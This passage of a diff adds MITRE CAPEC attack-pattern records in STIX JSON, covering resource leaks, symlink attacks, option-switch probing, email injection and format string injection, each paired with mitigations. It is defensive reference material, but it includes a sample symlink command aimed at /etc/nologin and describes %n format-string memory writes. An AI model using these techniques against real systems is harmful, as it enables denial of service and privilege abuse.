"x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the amount of resources that are accessible to unprivileged users.", + "id": "course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Consider all potentially relevant properties when validating input.", + "id": "course-of-action--98557606-654b-48be-90f9-47ef76f7034b", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--282aa96a-4a57-42b1-826a-e6e4abbd87db", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--98557606-654b-48be-90f9-47ef76f7034b", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Consider uniformly throttling all requests in order to make it more difficult to consume resources more quickly than they can again be freed.", + "id": "course-of-action--74868224-146c-41a0-afd2-66580f01aa44", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--51e066b9-7488-4231-91fa-099bbb87c489", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--74868224-146c-41a0-afd2-66580f01aa44", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use resource-limiting settings, if possible.", + "id": "course-of-action--e9d23f7b-bee1-4e7e-9621-9a0cb59e8bd4", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--98433369-590b-48b9-a19e-d159dde960e1", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9d23f7b-bee1-4e7e-9621-9a0cb59e8bd4", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests.", + "external_references": [ + { + "external_id": "CAPEC-131", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/131.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Endpoint Denial of Service", + "external_id": "T1499", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + } + ], + "id": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Resource Leak Exposure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful resource leak exposure attack compromises the availability of the target system's services.)", + "Resource Consumption (A successful resource leak exposure attack compromises the availability of the target system's services.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed.\n In this attack, the adversary determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the adversary. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until the target is reset, usually by restarting it. Thus, a resource-poor adversary who would be unable to flood the target can still utilize this attack.\n Resource depletion through leak differs from resource depletion through allocation in that, in the former, the adversary may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target's performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target must have a resource leak that the adversary can repeatedly trigger." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible, leverage coding language(s) that do not allow this weakness to occur (e.g., Java, Ruby, and Python all perform automatic garbage collection that releases memory for objects that have been deallocated).", + "id": "course-of-action--cf45c4fb-cc58-4502-876c-56d851cd73f9", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-131-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--adc4413e-bddd-423e-ba63-df78f79cc02f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf45c4fb-cc58-4502-876c-56d851cd73f9", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Memory should always be allocated/freed using matching functions (e.g., malloc/free, new/delete, etc.)", + "id": "course-of-action--d3e6855e-8bae-4987-bb3d-398e16bb2502", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-131-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d3e6855e-8bae-4987-bb3d-398e16bb2502", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement best practices with respect to memory management, including the freeing of all allocated resources at all exit points and ensuring consistency with how and where memory is freed in a function.", + "id": "course-of-action--e848e916-876c-4616-85ac-a44e4e90b63b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-131-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dbe99895-80e2-48af-966a-55f26aadd3d5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e848e916-876c-4616-85ac-a44e4e90b63b", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.", + "external_references": [ + { + "external_id": "CAPEC-132", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/132.html" + }, + { + "external_id": "CWE-59", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/59.html" + }, + { + "description": "Boot or Logon Autostart Execution:Shortcut Modification", + "external_id": "T1547.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547/009" + }, + { + "description": "Shaun Colley, Crafting Symlinks for Fun and Profit", + "external_id": "REF-13", + "source_name": "reference_from_CAPEC", + "url": "http://www.infosecwriters.com/texts.php?op=display&id=159" + } + ], + "id": "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Symlink Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Other (Information Leakage)", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The adversary creates a symlink with the \"same\" name as the file which the application is intending to write to. The application will write to the file- \"causing the data to be written where the symlink is pointing\". An attack like this can be demonstrated as follows:\n root# vulprog myFile\n {...program does some processing...]\n \n adversary# ln –s /etc/nologin myFile\n [...program writes to 'myFile', which points to /etc/nologin...]\n \n \n In the above example, the root user ran a program with poorly written file handling routines, providing the filename \"myFile\" to vulnprog for the relevant data to be written to. However, the adversary happened to be looking over the shoulder of \"root\" at the time, and created a link from myFile to /etc/nologin. The attack would make no user be able to login.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Target: Adversary identifies the target application by determining whether there is sufficient check before writing data to a file and creating symlinks to files in different directories.

    2. Techniques
    The adversary writes to files in different directories to check whether the application has sufficient checking before file operations.
    The adversary creates symlinks to files in different directories.

Experiment

  1. Try to create symlinks to different files: The adversary then uses a variety of techniques, such as monitoring or guessing to create symlinks to the files accessed by the target application in the directories which are identified in the explore phase.

    2. Techniques
    The adversary monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the adversary can delay the operations by using \"sleep(2)\" and \"usleep()\" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application.
    The adversary may need a little guesswork on the filenames on which the target application would operate.
    The adversary tries to create symlinks to the various filenames.

Exploit

  1. Target application operates on created symlinks to sensitive files: The adversary is able to create symlinks to sensitive files while the target application is operating on the file.

    2. Techniques
    Create the symlink to the sensitive file such as configuration files, etc.
", + "x_capec_extended_description": "\n The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications.\n In some variants of this attack the adversary may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the adversary may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the adversary to control the actions of the target or to cause the target to expose information to the adversary. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the adversary would normally have.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The targeted application must perform the desired activities on a file without checking whether the file is a symbolic link or not. The adversary must be able to predict the name of the file the target application is modifying and be able to create a new symbolic link where that file would appear." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The only requirement is the ability to create the necessary symbolic link." + ], + "x_capec_skills_required": { + "High": "To identify the files and create the symlinks during the file operation time window", + "Low": "To create symlinks" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Check for the existence of files to be created, if in existence verify they are neither symlinks nor hard links before opening them.", + "id": "course-of-action--f5210720-4324-4516-a229-f892a14476e3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-132-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8e73cf8-4cb5-4ae9-9a70-c2ebefdf62fc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f5210720-4324-4516-a229-f892a14476e3", + "target_ref": "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use randomly generated file names for temporary files. Give the files restrictive permissions.", + "id": "course-of-action--a30baed8-dcc2-47af-93ca-38ef0fe2e8e2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-132-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9cf8f1cf-51b6-4745-843d-2b4655e99ce6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a30baed8-dcc2-47af-93ca-38ef0fe2e8e2", + "target_ref": "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker attempts to invoke all common switches and options in the target application for the purpose of discovering weaknesses in the target. For example, in some applications, adding a --debug switch causes debugging information to be displayed, which can sometimes reveal sensitive processing or configuration information to an attacker. This attack differs from other forms of API abuse in that the attacker is indiscriminately attempting to invoke options in the hope that one of them will work rather than specifically targeting a known option. Nonetheless, even if the attacker is familiar with the published options of a targeted application this attack method may still be fruitful as it might discover unpublicized functionality.", + "external_references": [ + { + "external_id": "CAPEC-133", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/133.html" + }, + { + "external_id": "CWE-912", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/912.html" + } + ], + "id": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Try All Common Switches", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify application: Discover an application of interest by exploring service registry listings or by connecting on a known port or some similar means.

    2. Techniques
    Search via internet for known, published applications that allow option switches.
    Use automated tools to scan known ports to identify applications that might be accessible

  2. Authenticate to application: Authenticate to the application, if required, in order to explore it.

    3. Techniques
    Use published credentials to access system.
    Find unpublished credentails to access service.
    Use other attack pattern or weakness to bypass authentication.

Experiment

  1. Try all common switches: Using manual or automated means, attempt to run the application with many different known common switches. Observe the output to see if any switches seemed to put the application in a non production mode that might give more information.

    2. Techniques
    Manually execute the application with switches such as --debug, --test, --development, --verbose, etc.
    Use automated tools to run the application with common switches and observe the output

Exploit

  1. Use sensitive processing or configuration information: Once extra information is observed from an application through the use of a common switch, this information is used to aid other attacks on the application

    2. Techniques
    Using application information, formulate an attack on the application
", + "x_capec_prerequisites": [ + "The attacker must be able to control the options or switches sent to the target." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The only requirement is the ability to send requests to the target." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Minimize switch and option functionality to only that necessary for correct function of the command.", + "id": "course-of-action--98da757a-6fb3-4a86-b0b3-c7731ca1325b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-133-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9849d6f7-11c6-49c0-a3b7-a87ba59d92c3", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--98da757a-6fb3-4a86-b0b3-c7731ca1325b", + "target_ref": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Remove all debug and testing options from production code.", + "id": "course-of-action--86466080-30aa-42b1-a6cc-f8103cf49498", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-133-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--007dc896-33a1-418f-8400-a4ae48f79658", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86466080-30aa-42b1-a6cc-f8103cf49498", + "target_ref": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates the headers and content of an email message by injecting data via the use of delimiter characters native to the protocol.", + "external_references": [ + { + "external_id": "CAPEC-134", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/134.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "description": "Mail Command Injection", + "external_id": "30", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Mail-Command-Injection" + } + ], + "id": "attack-pattern--3e3f4570-827b-4e0e-859b-00a4b13a1a65", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Email Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n Many applications allow users to send email messages by filling in fields. For example, a web site may have a link to \"share this site with a friend\" where the user provides the recipient's email address and the web application fills out all the other fields, such as the subject and body. In this pattern, an adversary adds header and body information to an email message by injecting additional content in an input field used to construct a header of the mail message. This attack takes advantage of the fact that RFC 822 requires that headers in a mail message be separated by a carriage return. As a result, an adversary can inject new headers or content simply by adding a delimiting carriage return and then supplying the new heading and body information. This attack will not work if the user can only supply the message body since a carriage return in the body is treated as a normal character.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1" + ], + "x_capec_prerequisites": [ + "The target application must allow the user to send email to some recipient, to specify the content at least one header field in the message, and must fail to sanitize against the injection of command separators.", + "The adversary must have the ability to access the target mail application." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary includes formatting characters in a string input field on the target application. Most applications assume that users will provide static text and may respond unpredictably to the presence of formatting character. For example, in certain functions of the C programming languages such as printf, the formatting character %s will print the contents of a memory location expecting this location to identify a string and the formatting character %n prints the number of DWORD written in the memory. An adversary can use this to read or write to memory locations or files, or simply to manipulate the value of the resulting text in unexpected ways. Reading or writing memory may result in program crashes and writing memory could result in the execution of arbitrary code if the adversary can write to the program stack.", + "external_references": [ + { + "external_id": "CAPEC-135", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/135.html" + }, + { + "external_id": "CWE-134", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/134.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "description": "Format string attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Format_string_attack" + }, + { + "description": "Hal Burch, Brendan Saulsbury, FIO30-C. Exclude user input from format strings, 2011--05, CERT", + "external_id": "REF-14", + "source_name": "reference_from_CAPEC", + "url": "https://www.securecoding.cert.org/confluence/display/seccode/FIO30-C.+Exclude+user+input+from+format+strings" + }, + { + "description": "Robert Auger, WASC Threat Classification 2.0, The Web Application Security Consortium (WASC)", + "external_id": "REF-15", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Format-String" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-616", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Format_String_Injection.html" + } + ], + "id": "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Format String Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Untrusted search path vulnerability in the add_filename_to_string function in intl/gettext/loadmsgcat.c for Elinks 0.11.1 allows local users to cause Elinks to use an untrusted gettext message catalog (.po file) in a \"../po\" directory, which can be leveraged to conduct format string attacks. See also: CVE-2007-2027" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey application: The adversary takes an inventory of the entry points of the application.

    2. Techniques
    Spider web sites for all available links
    List parameters, external variables, configuration files variables, etc. that are possibly used by the application.

Experiment

  1. Determine user-controllable input susceptible to format string injection: Determine the user-controllable input susceptible to format string injection. For each user-controllable input that the adversary suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters.

    2. Techniques
    Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters.

Exploit

  1. Try to exploit the Format String Injection vulnerability: After determining that a given input is vulnerable to format string injection, hypothesize what the underlying usage looks like and the associated constraints.

    2. Techniques
    Insert various formatting characters to read or write the memory, e.g. overwrite return address, etc.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--4cd18074-15c1-4206-8391-115685669623" + ], + "x_capec_prerequisites": [ + "The target application must accept a strings as user input, fail to sanitize string formatting characters in the user input, and process this string using functions that interpret string formatting characters." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "In order to discover format string vulnerabilities it takes only low skill, however, converting this discovery into a working exploit requires advanced knowledge on the part of the adversary." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the usage of formatting string functions.", + "id": "course-of-action--2fed494b-5a78-425c-acaa-11d9ffec4342", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-135-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d7b9dd8b-8e73-4e2b-ba24-d8b7c5a033ec", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2fed494b-5a78-425c-acaa-11d9ffec4342", + "target_ref": "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters.", + "id": "course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-135-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 